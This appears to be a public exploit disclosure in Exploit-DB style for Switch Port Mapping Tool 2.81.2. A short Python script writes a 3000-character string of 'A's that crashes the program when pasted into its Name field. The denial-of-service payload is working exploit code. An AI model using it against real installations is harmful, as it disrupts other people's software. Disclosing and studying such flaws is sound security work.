# Exploit Title: Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC) # Discovery by: Shubham Singh # Known As: Spirited Wolf [Twitter: @Pwsecspirit] # Discovey Date: 2018-08-13 # Vendor Homepage: https://switchportmapper.com/ # Software Link: https://switchportmapper.com/download/spm2812.zip # Tested Version: 2.81.2 # Tested on OS: Windows 7 Ultimate x86_64 # Steps to Reproduce: # Run the python exploit script, it will create a new file with the name # "exploit.txt". Just copy the text inside "exploit.txt" and start the # Managed Switch Port Mapping Tool 2.81.2 program and click on "Enter Key". # In the 'Name field' paste the content of "exploit.txt" and click # on "OK". You will see a crash. #!/usr/bin/env python file = open("exploit.txt","wb") junk = "A" * 3000 exploit = junk buf = exploit file.write(buf) file.close()